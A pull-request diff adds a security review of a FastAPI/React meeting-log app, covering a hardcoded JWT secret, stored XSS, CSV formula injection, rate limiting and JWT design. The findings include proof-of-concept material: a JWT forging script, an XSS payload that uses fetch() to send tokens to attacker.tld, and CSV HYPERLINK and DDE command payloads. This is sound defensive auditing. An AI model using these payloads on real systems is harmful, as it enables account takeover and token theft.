### PR TITLE
docs(security): add comprehensive security review in plans/git-issues

### DIFF
--- a/plans/git-issues/security-review/00-executive-summary.md
+++ b/plans/git-issues/security-review/00-executive-summary.md
@@ -1,0 +1,76 @@
+# Executive Summary — Security Review
+
+## Posture at a glance
+
+**Overall rating:** ⚠ **Needs work before untrusted-public deployment.**
+
+The Recovery Dharma Secretary Log is a well-structured FastAPI + React application with many right-shaped primitives already in place: bcrypt password hashing, a proper OAuth2-password token flow, Pydantic request validation, SQLAlchemy ORM (no raw SQL in request handlers), bandit/ruff/mypy/detect-secrets in pre-commit, and CI gates. That foundation is strong.
+
+However, the review surfaced **2 Critical**, **6 High**, **9 Medium**, **4 Low**, and **3 Informational** findings. The critical-rated issues are exploitable by any authenticated group member against other group members (stored XSS in the printable export) and by any operator who omits an environment variable (a dev JWT signing key hardcoded in source). Together they push the current risk above the bar for running the instance on the open internet.
+
+## Threat model (summary)
+
+- **Primary attacker:** an authenticated user in a group who wants to escalate to other members of the same group (stored XSS, CSV injection).
+- **Secondary attacker:** an unauthenticated internet user who wants to guess invite codes, brute-force passwords, enumerate usernames, or DoS expensive endpoints.
+- **Tertiary attacker:** an operator who makes a benign config mistake (forgetting `RD_LOG_ENVIRONMENT=production`) and inadvertently exposes a known secret.
+- **Supply-chain attacker:** a malicious dependency/action update reaching the app via unbounded version specifiers or a GitHub Actions workflow trigger.
+
+See [`22-informational-threat-model.md`](./22-informational-threat-model.md) for the full STRIDE breakdown.
+
+## Top-five actions (if you only do five)
+
+1. **Remove the hardcoded dev JWT secret fallback** and fail-closed on any environment where `RD_LOG_SECRET_KEY` is not set — not merely when `RD_LOG_ENVIRONMENT != "development"`. See [#01](./01-critical-hardcoded-dev-secret-fallback.md).
+2. **HTML-escape all data rendered into the printable export** (`group.name`, `speaker_name`, `topic.name`, chapter `title`). Use a templating engine with autoescape (Jinja2 `autoescape=True`) or `html.escape` applied per field. See [#02](./02-critical-stored-xss-html-export.md).
+3. **Sanitise CSV cell values** with RFC-4180-compliant quoting **and** leading-formula-character neutralisation (`=`, `+`, `-`, `@`, CR, LF, TAB). See [#03](./03-high-csv-formula-injection.md).
+4. **Rate-limit authentication endpoints** (`/auth/login`, `/auth/register`) and invite-code-based joins. Add a minimum password policy, reject passwords > 72 bytes, and (ideally) check Pwned Passwords. See [#04](./04-high-no-auth-rate-limiting.md) and [#08](./08-high-weak-password-policy-bcrypt-truncation.md).
+5. **Ship default security headers** (CSP with `script-src 'self'`, HSTS, `X-Content-Type-Options: nosniff`, `Referrer-Policy`, `Permissions-Policy`) and tighten CORS away from `allow_methods=["*"]` / `allow_headers=["*"]`. See [#07](./07-high-missing-security-headers.md) and [#09](./09-medium-cors-permissive-configuration.md).
+
+## Severity scoring
+
+Severity in this review is a composite of:
+- **Exploitability** (prerequisites, attacker privilege required, discoverability)
+- **Blast radius** (single user vs. one group vs. all users vs. host compromise)
+- **Data sensitivity** (recovery-community association is sensitive even though the product doesn't collect regulated PII)
+- **Fix cost** (low cost + high impact = elevated priority)
+
+CVSS-style vector strings are provided on each individual finding where useful.
+
+## What looks good
+
+- **Password hashing.** `bcrypt.hashpw` with fresh salt on each registration; `bcrypt.checkpw` on verify. Not MD5/SHA; not a home-rolled KDF. (`backend/app/auth.py:18-27`)
+- **ORM-only data access.** No f-string `WHERE` clauses in request handlers; all filters go through SQLAlchemy expression language. The single place that uses `text(...)` is the idempotent startup migration runner with a hardcoded list (still worth reviewing — see [#17](./17-medium-migration-sql-risk-and-race.md)).
+- **Secure randomness.** `secrets.choice` is used for topic draws and invite-code generation, not `random.random`.
+- **Authorization-by-group.** Every data-mutating endpoint filters by `current_user.group_id` (verified across `routers/{meetings,book,topics,speakers,overrides,settings,setup,activity,export}.py`) — no direct-object-reference (IDOR) holes across group boundaries.
+- **React 19.** Default auto-escaping; no `dangerouslySetInnerHTML` or `innerHTML` anywhere in `frontend/src` (verified via grep). The frontend side of stored XSS is closed.
+- **Pre-commit stack.** `bandit`, `ruff`, `mypy --strict`, `detect-secrets`, `tryceratops`, `refurb`, `vulture`, `prettier` — an above-average static-analysis baseline.
+
+## What doesn't look good
+
+- **Single-tenant trust assumptions in a multi-tenant design.** Any group member can rewrite any group setting, generate invite codes, and trigger XSS against other members. There is no admin vs. member role ([#12](./12-medium-no-rbac-or-admin-roles.md)).
+- **JWT in `localStorage`.** Token is accessible to any script that executes on the SPA origin; combined with the lack of CSP, an XSS breach leaks sessions for 24 hours ([#06](./06-high-token-storage-localstorage-xss.md), [#05](./05-high-jwt-design-weaknesses.md)).
+- **No rate limiting anywhere.** Neither at FastAPI middleware nor at the edge (Railway terms). Easy credential stuffing and deck/export DoS ([#04](./04-high-no-auth-rate-limiting.md)).
+- **Unbounded Python dep versions** (`>=`) and no `pip-audit` / `npm audit` gate in CI ([#14](./14-medium-dependency-pinning-and-scanning.md)).
+- **Docker image runs as `root`** and bundles `pip` in the runtime image ([#15](./15-medium-docker-container-hardening.md)).
+
+## Compliance / framework mapping
+
+| Framework | Gap area | Findings |
+|-----------|----------|----------|
+| OWASP Top 10 (2021) | A01 Broken Access Control | #12, #11 |
+| | A02 Cryptographic Failures | #01, #05 |
+| | A03 Injection | #02, #03, #17 |
+| | A05 Security Misconfiguration | #07, #09, #15, #17 |
+| | A07 Identification/Auth Failures | #04, #05, #06, #08, #19 |
+| | A08 Software & Data Integrity | #13, #14, #16 |
+| | A09 Logging & Monitoring | #13, #21, #24 |
+| OWASP API Security Top 10 (2023) | API2 Broken Auth | #04, #05, #06, #08 |
+| | API4 Unrestricted Resource Consumption | #04 |
+| | API5 Broken Function-Level Authorization | #12 |
+| | API8 Security Misconfiguration | #07, #09 |
+| | API9 Improper Inventory | #14 |
+| OWASP ASVS v4.0.3 | V2 Authentication | #04, #05, #08 |
+| | V3 Session Management | #05, #06, #19 |
+| | V5 Validation/Sanitisation | #02, #03, #21 |
+| | V7 Error Handling & Logging | #13, #18, #21 |
+| | V14 Configuration | #01, #07, #09, #15 |
+| SSDF (NIST SP 800-218) | PW.4, PW.7, PW.8 | #14, #16, #24 |

--- a/plans/git-issues/security-review/01-critical-hardcoded-dev-secret-fallback.md
+++ b/plans/git-issues/security-review/01-critical-hardcoded-dev-secret-fallback.md
@@ -1,0 +1,101 @@
+# [Critical] Hardcoded dev JWT secret key with insufficient production guard
+
+**Severity:** 🔴 Critical
+**CVSS v3.1 (estimated):** 9.1 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+**CWEs:** CWE-798 (Use of Hard-coded Credentials), CWE-1188 (Insecure Default Initialization of Resource), CWE-321 (Use of Hard-coded Cryptographic Key)
+**OWASP:** A02:2021 Cryptographic Failures, A05:2021 Security Misconfiguration, ASVS V2.10.3 / V14.1.1
+
+## Summary
+
+`Settings.secret_key` defaults to the publicly visible constant `"dev-secret-key-change-in-production"` in [`backend/app/config.py:11`](../../../backend/app/config.py). The production guard in [`backend/app/main.py:129-134`](../../../backend/app/main.py) only trips when `settings.environment != "development"`. The environment defaults to `"development"` (`config.py:15`) — so an operator who **sets `RD_LOG_DATABASE_URL` and `RD_LOG_CORS_ORIGINS` but forgets `RD_LOG_ENVIRONMENT=production`** will run a publicly accessible instance with a secret key that is literally in this Git history.
+
+Because the JWT algorithm is HS256 (symmetric), anyone who knows the key — which is everyone who has read the repo — can mint a valid token for any `sub` (username). The backend's `get_current_user` dependency looks up the user by `username` from the JWT; no other claim is checked. A single forged JWT → full compromise of any existing account, full control of that user's group (settings, invite codes, meeting log, book position), and arbitrary actions recorded against them in the audit log.
+
+## Where
+
+- `backend/app/config.py:11` — default value `"dev-secret-key-change-in-production"`.
+- `backend/app/config.py:15` — default environment `"development"`.
+- `backend/app/main.py:129-134` — guard only fires on `environment != "development"`.
+- `backend/app/auth.py:30-37` — signs with this key.
+- `backend/app/auth.py:50-55` — verifies with this key.
+- `.env.example` — documents the variables but an operator can still miss one.
+
+## Attack narrative
+
+1. Attacker reads the public GitHub repository and notes the dev secret.
+2. Attacker forges a JWT with `{"sub": "<victim-username>", "exp": <future>}` signed with `HS256` and the known key using a one-line script:
+   ```python
+   import jwt, time
+   print(jwt.encode({"sub": "alice", "exp": int(time.time()) + 3600},
+                    "dev-secret-key-change-in-production", algorithm="HS256"))
+   ```
+3. Attacker sends the token in `Authorization: Bearer …`. The server accepts it.
+4. Attacker has full in-group privileges of `alice`.
+
+Username discovery is easy: the register endpoint discloses which usernames exist ([#10](./10-medium-username-enumeration.md)). Even without that, common names (`admin`, `secretary`, group organiser's first name) are worth trying.
+
+## Why the current guard is not sufficient
+
+- **Default fails open.** `environment` defaults to `"development"`, so the most dangerous configuration is the zero-config one.
+- **Startup-only check.** Triggers only during `lifespan`. In unit tests, scripts (`seed.py`), or any tooling that imports `app.auth` without starting the app, nothing stops the dev key from being used.
+- **Not a function of the key's value.** The guard compares a string constant to a string constant; if the value of the fallback changes in future, the guard still won't detect "an operator is using the repo default".
+
+## Recommended fix
+
+Adopt a **fail-closed** default: treat the absence of `RD_LOG_SECRET_KEY` as an error, except in the explicit test environment.
+
+```python
+# backend/app/config.py
+import os
+from pydantic import Field, SecretStr
+from pydantic_settings import BaseSettings
+
+
+class Settings(BaseSettings):
+    app_name: str = "Recovery Dharma Secretary Log"
+    database_url: str = "sqlite:///./rd_log.db"
+    secret_key: SecretStr  # REQUIRED; no default
+    algorithm: str = "HS256"
+    access_token_expire_minutes: int = 60  # also see #05
+    cors_origins: str = "http://localhost:5173"
+    environment: str = "development"
+
+    model_config = {"env_prefix": "RD_LOG_"}
+
+
+def _load_settings() -> Settings:
+    # Auto-generate a per-process ephemeral key only when clearly in tests.
+    if os.environ.get("PYTEST_CURRENT_TEST") or os.environ.get("RD_LOG_ENVIRONMENT") == "test":
+        os.environ.setdefault("RD_LOG_SECRET_KEY", "test-only-" + os.urandom(16).hex())
+    return Settings()
+
+
+settings = _load_settings()
+```
+
+Access it as `settings.secret_key.get_secret_value()` wherever it is consumed.
+
+Additionally:
+- Remove the hardcoded `_DEV_SECRET_KEY` from `main.py`. The value should never be compared — it should never exist.
+- Log a **warning** (not an error) at startup with `settings.algorithm`, `access_token_expire_minutes`, `environment`, and a hashed fingerprint (`hashlib.sha256(key).hexdigest()[:8]`) of the secret to help operators confirm rotation across deployments **without** leaking the value.
+- Document a key-rotation SOP: rotate on compromise, and plan rotation as part of scheduled maintenance.
+
+### Defence-in-depth
+
+- Add `iss` (`"rd-log"`) and `aud` (deployment hostname) claims to tokens (see [#05](./05-high-jwt-design-weaknesses.md)) — so a leaked key from a test deployment still won't sign tokens accepted by production.
+- Migrate off HS256 to asymmetric (EdDSA / RS256) once you have a second service, so the signing key need not live on every backend instance.
+- Consider moving to a managed KMS (Railway secrets + KMS integration, or AWS KMS signing) if operational complexity allows.
+
+## Acceptance criteria
+
+- [ ] Startup fails with a clear message on any environment where `RD_LOG_SECRET_KEY` is unset **and** `RD_LOG_ENVIRONMENT` is not one of `{"test", "development"}`.
+- [ ] In `"development"`, startup fails unless either a real key is supplied or a well-known `"dev-"` prefix is explicitly used **and** the server refuses to bind to anything other than `localhost`.
+- [ ] `"dev-secret-key-change-in-production"` is removed from the source tree (ripgrep returns zero matches after the fix).
+- [ ] Unit test asserts that constructing `Settings()` without `RD_LOG_SECRET_KEY` raises `ValidationError`.
+- [ ] Operations runbook (`docs/operations/secrets.md`) documents generation (`python -c "import secrets; print(secrets.token_urlsafe(32))"`), rotation, and revocation of tokens after rotation.
+
+## References
+
+- CWE-798: https://cwe.mitre.org/data/definitions/798.html
+- OWASP ASVS V2.10: https://owasp.org/www-project-application-security-verification-standard/
+- `python-jose` JWT best practice: https://datatracker.ietf.org/doc/html/rfc8725

--- a/plans/git-issues/security-review/02-critical-stored-xss-html-export.md
+++ b/plans/git-issues/security-review/02-critical-stored-xss-html-export.md
@@ -1,0 +1,126 @@
+# [Critical] Stored XSS in printable HTML export
+
+**Severity:** 🔴 Critical (in the multi-member group threat model)
+**CVSS v3.1 (estimated):** 8.0 — AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L
+**CWEs:** CWE-79 (Improper Neutralization of Input During Web Page Generation), CWE-116 (Improper Encoding or Escaping of Output)
+**OWASP:** A03:2021 Injection, ASVS V5.3.3 / V5.3.4
+
+## Summary
+
+`backend/app/services.py:generate_printable_export` (lines ~1124–1210) assembles HTML with Python f-strings, interpolating user-controlled values with **no HTML escaping**:
+
+```python
+rows.append(
+    f"<tr><td>{entry.meeting_date}</td>"
+    f"<td>{entry.format_type}</td>"
+    f"<td>{content}</td>"
+    f"<td>{dana}</td></tr>"
+)
+...
+return f"""<!DOCTYPE html>
+<html><head><title>Meeting Log - {group.name}</title>...
+<h1>{group.name}</h1>...
+"""
+```
+
+The `{content}` value flows from `_get_entry_content` → `entry.speaker_name`, `Topic.name`, or `_get_book_chapter_summary` → `BookChapter.title`. Every one of those values is user-controlled:
+
+- `group.name` — any authenticated user can write it via `PUT /api/settings/` (no RBAC; see [#12](./12-medium-no-rbac-or-admin-roles.md)).
+- `speaker_name` — any authenticated user can set it via `POST /api/speakers/schedule` or `PUT /api/meetings/log/{id}`.
+- `Topic.name` — any authenticated user can set it via `POST /api/topics/`.
+- `BookChapter.title` — currently only settable via `seed.py`, but the column is plain `String(255)` with no write endpoint today — still indirectly reachable via direct DB access during debugging.
+
+Because Recovery Dharma Log is designed to be **multi-user-per-group** (invite codes, joinable groups), an attacker who is a member of the victim's group (or who brute-forces an invite code per [#11](./11-medium-invite-code-abuse.md)) can plant a payload and wait for the victim to click "Printable View". The printable export is served as `text/html` on the same origin as the SPA, so an inline `<script>` runs with full access to the user's session (token in `localStorage` — see [#06](./06-high-token-storage-localstorage-xss.md)).
+
+## Proof-of-concept
+
+1. Alice and Mallory are both in Group 17 (Mallory joined with an invite code Alice generated).
+2. Mallory: `POST /api/topics/` with `{"name": "<img src=x onerror=fetch('https://attacker.tld/?t='+localStorage.getItem('rd_log_token'))>"}`.
+3. Mallory: `POST /api/topics/draw` so the topic is attached to a meeting log entry.
+4. Alice: opens "Printable View" from `Log.tsx:88`. The malicious string is interpolated raw into a `<td>...</td>`. The `<img onerror>` fires. Alice's JWT is exfiltrated.
+5. Mallory uses Alice's token until it expires (default 24h, see [#05](./05-high-jwt-design-weaknesses.md)). Mallory can also plant persistent payloads under Alice's name.
+
+The same payload plugged into `group.name` lands inside the `<title>` and `<h1>` tags, bypassing any partial escaping of `<td>` content.
+
+## Where
+
+- `backend/app/services.py` — `_build_export_rows` (~line 1098), `_get_entry_content` (~line 1085), `generate_printable_export` (~line 1124).
+- `backend/app/routers/export.py:33-45` — the router that returns the HTML with `media_type="text/html"`.
+- `frontend/src/pages/Log.tsx:88` — the `<a target="_blank">` link users click.
+
+## Recommended fix
+
+Prefer a templating engine with **autoescape on by default** rather than sprinkling `html.escape` calls:
+
+```python
+# backend/app/services.py
+from html import escape
+from jinja2 import Environment, BaseLoader, select_autoescape
+
+_PRINTABLE_TEMPLATE_SRC = """<!DOCTYPE html>
+<html>
+<head>
+<meta charset="utf-8">
+<title>Meeting Log - {{ group.name }}</title>
+...
+</head>
+<body>
+<h1>{{ group.name }}</h1>
+<hr class="header-rule">
+{% if date_range %}<p class="date-range">{{ date_range }}</p>{% endif %}
+<table>
+  <thead><tr><th>Date</th><th>Format</th><th>Content</th><th>Dana</th></tr></thead>
+  <tbody>
+    {% for row in rows %}
+      <tr><td>{{ row.date }}</td><td>{{ row.format }}</td><td>{{ row.content }}</td><td>{{ row.dana }}</td></tr>
+    {% endfor %}
+    {% for _ in range(blank_rows) %}
+      <tr class="blank-row"><td>&nbsp;</td><td></td><td></td><td></td></tr>
+    {% endfor %}
+  </tbody>
+</table>
+<p class="footer">Generated from RD Log</p>
+</body>
+</html>"""
+
+_env = Environment(
+    loader=BaseLoader(),
+    autoescape=select_autoescape(enabled_extensions=("html",), default=True),
+)
+_template = _env.from_string(_PRINTABLE_TEMPLATE_SRC)
+
+
+def generate_printable_export(...):
+    rows = [
+        {
+            "date": entry.meeting_date.isoformat(),
+            "format": entry.format_type,
+            "content": _get_entry_content(db, group, entry),
+            "dana": f"${entry.dana_amount:.2f}" if entry.dana_amount is not None else "",
+        }
+        for entry in entries
+    ]
+    return _template.render(group=group, rows=rows, blank_rows=blank_rows,
+                            date_range=_format_date_range(start_date, end_date))
+```
+
+### Additional hardening
+
+1. **Serve downloads (not previews).** Add `Content-Disposition: attachment; filename="meeting_log_YYYYMMDD.html"` to force download and avoid rendering in the same origin browsing context.
+2. **Content Security Policy.** Emit a per-response CSP on the export: `Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; font-src https://fonts.gstatic.com; img-src data:`. Any script tags in user input become dead weight.
+3. **Reflected URL parameters.** `start_date`/`end_date` parse as `date` so they cannot carry HTML, but add a defence-in-depth test anyway.
+4. **Server-side input caps.** Reject topic/speaker/group names longer than the underlying column (`String(255)` in `models.py`) with a 400, rather than relying on DB truncation.
+5. **Pydantic validators** that reject control characters and strip leading/trailing whitespace for all name fields (see [#08](./08-high-weak-password-policy-bcrypt-truncation.md) for similar tightening).
+
+## Acceptance criteria
+
+- [ ] `curl /api/export/printable` with `group.name="<script>1</script>"` produces output where `<script>` appears as `&lt;script&gt;` in the HTML body and in the title.
+- [ ] Unit tests added that assert HTML-escaped output for every interpolation point (group name, speaker name, topic name, chapter title, date_range).
+- [ ] Export response sets a restrictive CSP header.
+- [ ] Static analysis (bandit `B703` / manual rule) blocks `f"""...<...{var}...>"""` patterns in files that emit HTML.
+
+## References
+
+- CWE-79: https://cwe.mitre.org/data/definitions/79.html
+- OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
+- Jinja2 autoescape: https://jinja.palletsprojects.com/en/stable/api/#autoescaping

--- a/plans/git-issues/security-review/03-high-csv-formula-injection.md
+++ b/plans/git-issues/security-review/03-high-csv-formula-injection.md
@@ -1,0 +1,107 @@
+# [High] CSV formula injection and broken CSV quoting in meeting-log export
+
+**Severity:** 🟠 High
+**CVSS v3.1 (estimated):** 7.3 — AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
+**CWEs:** CWE-1236 (Improper Neutralization of Formula Elements in a CSV File), CWE-74 (Improper Neutralization of Special Elements in Output)
+**OWASP:** A03:2021 Injection, ASVS V5.3.10
+
+## Summary
+
+`backend/app/services.py:_format_csv_row` (~line 1036) builds each CSV row via f-string concatenation:
+
+```python
+return (
+    f"{entry.meeting_date},{entry.format_type},"
+    f'"{speaker}","{topic_name}","{book_section}",{cancelled},{dana}'
+)
+```
+
+Two defects compound:
+
+1. **Formula injection (CWE-1236).** When a cell value begins with `=`, `+`, `-`, `@`, or a tab/CR, Excel / LibreOffice / Google Sheets interprets the cell as a formula. `speaker_name`, `topic_name`, and `group.name` all flow in unvalidated. An attacker in a group can set `speaker_name` to `=HYPERLINK("https://attacker.tld/?s="&A1,"click")` or historically worse (`=cmd|' /c calc'!A0` under DDE) and the secretary who opens the CSV triggers a credential-stealing link or, in unpatched spreadsheet software, arbitrary code execution.
+2. **Broken quoting (RFC 4180).** The code wraps fields in `"..."` but does not double internal quotes. A `speaker_name` containing `"` breaks the CSV structure, shifts column boundaries, and can smuggle a new record into the export. Combined with (1) this allows arbitrary formula placement.
+
+The exported CSV is authenticated (only a group member can fetch it), but the *reader* — the secretary in their own spreadsheet software — is the victim. Because the attacker and the reader are both group members, and the group is invitable ([#11](./11-medium-invite-code-abuse.md)), the path is realistic.
+
+## Proof-of-concept payloads
+
+| Field | Value |
+|-------|-------|
+| `speaker_name` | `=HYPERLINK("https://attacker.tld/?t="&CELL("contents",B1),"Schedule")` |
+| `group.name` (→ printable export title; also dumps into CSV if later added to the header) | `",=HYPERLINK(...)` |
+| `Topic.name` | `@SUM(A1:A2)` |
+| `speaker_name` (quote-escape break) | `Mallory","=2+2","",,` |
+
+## Where
+
+- `backend/app/services.py:_format_csv_row` (~1036–1053)
+- `backend/app/services.py:generate_csv_export` (~1056–1067)
+- `backend/app/routers/export.py:17-30`
+
+## Recommended fix
+
+Use Python's `csv` module with `csv.writer(..., quoting=csv.QUOTE_ALL)` — it handles RFC-4180 escaping — **and** prefix a neutralising character to any value that starts with a formula indicator.
+
+```python
+import csv
+import io
+
+_FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r", "\n")
+
+def _neutralise(value: str | None) -> str:
+    if value is None:
+        return ""
+    if value.startswith(_FORMULA_PREFIXES):
+        return "'" + value   # single-quote prefix neutralises formula parsing
+    return value
+
+
+def generate_csv_export(
+    db: Session,
+    group: Group,
+    start_date: date | None = None,
+    end_date: date | None = None,
+) -> str:
+    entries = _query_meeting_log(db, group, start_date, end_date)
+    buf = io.StringIO()
+    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
+    writer.writerow(["date", "format", "speaker", "topic", "book_section", "cancelled", "dana"])
+    for entry in entries:
+        topic_name = ""
+        if entry.topic_id:
+            topic = db.query(Topic).filter(Topic.id == entry.topic_id).first()
+            topic_name = topic.name if topic else ""
+        book_section = ""
+        if entry.format_type == "Book Study" and not entry.is_cancelled:
+            book_section = _get_book_chapter_summary(db, group, entry.meeting_date) or ""
+        writer.writerow([
+            entry.meeting_date.isoformat(),
+            entry.format_type,
+            _neutralise(entry.speaker_name),
+            _neutralise(topic_name),
+            _neutralise(book_section),
+            "Yes" if entry.is_cancelled else "",
+            f"{entry.dana_amount:.2f}" if entry.dana_amount is not None else "",
+        ])
+    return buf.getvalue()
+```
+
+### Additional hardening
+
+- Set `Content-Type: text/csv; charset=utf-8` and `Content-Disposition: attachment; filename="meeting_log.csv"` (the attachment disposition is already there — good).
+- Serve with `X-Content-Type-Options: nosniff` so the CSV is never interpreted as HTML (part of [#07](./07-high-missing-security-headers.md)).
+- Add a UTF-8 BOM (`\ufeff`) at the start of the CSV — helps Excel parse Unicode correctly **and** means a leading attacker-controlled `=` is no longer the first byte of the cell.
+- Apply the same neutralisation to the header-row name columns if any user-controlled fields ever end up there.
+
+## Acceptance criteria
+
+- [ ] CSV output for a speaker named `=1+1` is quoted as `"'=1+1"` (leading apostrophe + surrounding quotes) and does not execute as a formula in Excel/Google Sheets (manually verify).
+- [ ] CSV output for a topic named `a","b` produces a single cell containing the exact text, not a new column/row boundary.
+- [ ] Tests (`pytest`) in `backend/tests/` include property-based cases (hypothesis) over arbitrary Unicode strings asserting round-trip correctness and absence of formula-leading characters without neutralisation prefix.
+- [ ] CSV response sets `X-Content-Type-Options: nosniff`.
+
+## References
+
+- OWASP CSV Injection: https://owasp.org/www-community/attacks/CSV_Injection
+- CWE-1236: https://cwe.mitre.org/data/definitions/1236.html
+- Historical DDE CVEs (CVE-2014-3524 etc.) — why apparently-benign CSVs need hardening.

--- a/plans/git-issues/security-review/04-high-no-auth-rate-limiting.md
+++ b/plans/git-issues/security-review/04-high-no-auth-rate-limiting.md
@@ -1,0 +1,111 @@
+# [High] No rate limiting on authentication or expensive endpoints
+
+**Severity:** 🟠 High
+**CVSS v3.1 (estimated):** 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
+**CWEs:** CWE-307 (Improper Restriction of Excessive Authentication Attempts), CWE-770 (Allocation of Resources Without Limits or Throttling), CWE-799 (Improper Control of Interaction Frequency)
+**OWASP:** A07:2021 Identification and Authentication Failures, API4:2023 Unrestricted Resource Consumption, ASVS V2.2.1
+
+## Summary
+
+No endpoint in the application enforces a rate limit — neither at FastAPI middleware, nor at the reverse proxy, nor via platform configuration (`railway.json` has no rate-limit directive). The worst gaps:
+
+- **`POST /auth/login`** (`backend/app/routers/auth.py:88`). Bcrypt adds per-attempt cost (~80ms at the default factor) but that is still **~12 attempts/second per connection × thousands of concurrent connections**. With the default 24-hour token TTL ([#05](./05-high-jwt-design-weaknesses.md)), every successful guess yields a long-lived token.
+- **`POST /auth/register`** (same file, line 19). An attacker can enumerate usernames ([#10](./10-medium-username-enumeration.md)) and also use register to probe invite codes ([#11](./11-medium-invite-code-abuse.md)).
+- **`POST /auth/register` with `invite_code`** performs an unrestricted guess against the 8-char alphanumeric space without any IP-based throttling.
+- **Expensive reads** such as `GET /meetings/upcoming/lookahead?weeks=12` (`routers/meetings.py:39`), `GET /speakers/upcoming?weeks=52` (`routers/speakers.py:38`), and `GET /export/printable` each walk weeks of data and fire many per-date DB queries through `get_format_for_date`. Left unthrottled, any authenticated user can sustain high DB load.
+- **`POST /topics/draw`** triggers a cascade of queries and commits; no throttle.
+
+Bcrypt provides **per-attempt** cost but not **per-source** throttling. It does not stop:
+- Distributed credential stuffing with stolen password lists.
+- Sequential password spraying at 10 req/s against known usernames.
+- Authenticated users hammering DoS-capable endpoints.
+
+## Where
+
+- `backend/app/main.py:140-148` — FastAPI app instantiation. No rate-limit middleware.
+- `backend/app/routers/auth.py:19-102` — register/login handlers have no throttle.
+- `backend/app/routers/auth.py:29-36` — invite-code verification path.
+- `backend/app/routers/meetings.py:38-45` — unbounded week lookahead up to 12.
+- `backend/app/routers/speakers.py:36-67` — 52-week lookahead with per-week DB query.
+
+## Recommended fix
+
+### Backend middleware — `slowapi` (drop-in for FastAPI)
+
+```python
+# requirements.txt
+slowapi>=0.1.9
+
+# backend/app/main.py
+from slowapi import Limiter, _rate_limit_exceeded_handler
+from slowapi.errors import RateLimitExceeded
+from slowapi.util import get_remote_address
+
+limiter = Limiter(
+    key_func=get_remote_address,
+    default_limits=["120/minute"],   # global per-IP
+    storage_uri=os.environ.get("RD_LOG_RATELIMIT_STORAGE", "memory://"),
+)
+app.state.limiter = limiter
+app.add_exception_handler(RateLimitExceeded, _rate_limit_exceeded_handler)
+```
+
+Per-route tightening:
+
+```python
+# backend/app/routers/auth.py
+from slowapi.util import get_remote_address
+from app.main import limiter   # circular-import-safe pattern: use a shared module
+
+@router.post("/login", response_model=Token)
+@limiter.limit("5/minute;30/hour")
+def login(...): ...
+
+@router.post("/register", response_model=UserResponse)
+@limiter.limit("3/minute;10/hour")
+def register(...): ...
+```
+
+### Account-level lockout (complementary)
+
+Rate limiting by IP alone is defeated by rotating-IP botnets. Add a per-account backoff:
+
+```python
+# pseudocode
+failed = redis.incr(f"login_fail:{username}")
+if failed == 1:
+    redis.expire(f"login_fail:{username}", 900)  # 15 min window
+if failed > 10:
+    raise HTTPException(429, "Account temporarily locked")
+```
+
+Use **exponential delays** on consecutive failures rather than a hard lock (avoids DoS-by-lockout of a known username). Reset on successful login.
+
+### Storage for limits
+
+- For single-instance deployments (today): in-process `memory://` is fine.
+- For multi-replica (future): Redis (`redis://...`). Railway offers a managed Redis add-on.
+
+### Platform-level defence-in-depth
+
+- Configure Cloudflare / Railway edge rate limit, e.g. 60 req/min per IP for `/auth/*`.
+- Add `fail2ban`-style tailing of access logs if edge isn't available.
+
+### Bound expensive endpoints
+
+- Keep `weeks` upper bound low (the existing `le=12` for meetings and `le=52` for speakers are too permissive). Reduce to `le=8` and `le=16` respectively, or implement pagination.
+- Add `@limiter.limit("30/minute")` on `/export/*`, `/meetings/upcoming/lookahead`, and `/speakers/upcoming`.
+
+## Acceptance criteria
+
+- [ ] After 5 failures on `/auth/login` from the same IP within 60s, the 6th returns HTTP 429.
+- [ ] After 10 failed logins for `user=alice` (any IP), successive attempts are delayed at least 1s per attempt.
+- [ ] `/export/printable` returns 429 after sustained 30 req/min from a single user.
+- [ ] Integration tests in `backend/tests/test_rate_limit.py` verify 429 on login brute force and invite-code brute force.
+- [ ] Rate-limit events are logged with `{user_or_ip, endpoint, count, window}` to the audit log.
+
+## References
+
+- OWASP Authentication Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html
+- slowapi: https://slowapi.readthedocs.io/
+- CWE-307: https://cwe.mitre.org/data/definitions/307.html

--- a/plans/git-issues/security-review/05-high-jwt-design-weaknesses.md
+++ b/plans/git-issues/security-review/05-high-jwt-design-weaknesses.md
@@ -1,0 +1,144 @@
+# [High] JWT design weaknesses — no revocation, long TTL, missing standard claims
+
+**Severity:** 🟠 High
+**CVSS v3.1 (estimated):** 7.1 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
+**CWEs:** CWE-613 (Insufficient Session Expiration), CWE-384 (Session Fixation adjacent), CWE-287 (Improper Authentication)
+**OWASP:** A07:2021 Identification and Authentication Failures, API2:2023 Broken Authentication, ASVS V3.3 / V3.5
+
+## Summary
+
+The JWT implementation works but leaves out nearly every defence-in-depth claim and mechanism recommended in RFC 8725 (JWT Best Current Practices):
+
+1. **24-hour token lifetime by default** (`config.py:13` — `access_token_expire_minutes: int = 1440`). That is an acceptable life for a *session*, but here it is also the life of a *stolen token* because there is no revocation.
+2. **No refresh-token pattern.** Clients must keep a long-lived access token in `localStorage` ([#06](./06-high-token-storage-localstorage-xss.md)) for the full 24 hours.
+3. **No `jti` (JWT ID).** Server cannot blocklist a single token.
+4. **No `iss` or `aud` claim.** A token minted for one deployment (staging) is usable on another (production) if the keys happen to overlap. Not a direct bug today but a footgun once multiple environments exist.
+5. **No `nbf` (not-before).** Minor, but helps detect clock-skew abuse.
+6. **Username as `sub`.** `get_current_user` looks up `User.username == payload.sub` (`auth.py:62`). Usernames are human-editable in theory; if a rename feature is added later and `sub` isn't migrated, orphan tokens could point to wrong accounts. Prefer an immutable numeric `sub` (user id).
+7. **`jwt.decode` does not pin the algorithm list strictly enough.** It uses `algorithms=[settings.algorithm]` which is safe *today*, but if `settings.algorithm` ever becomes a comma-separated list the decode call silently becomes permissive. Use an explicit constant list: `algorithms=["HS256"]`.
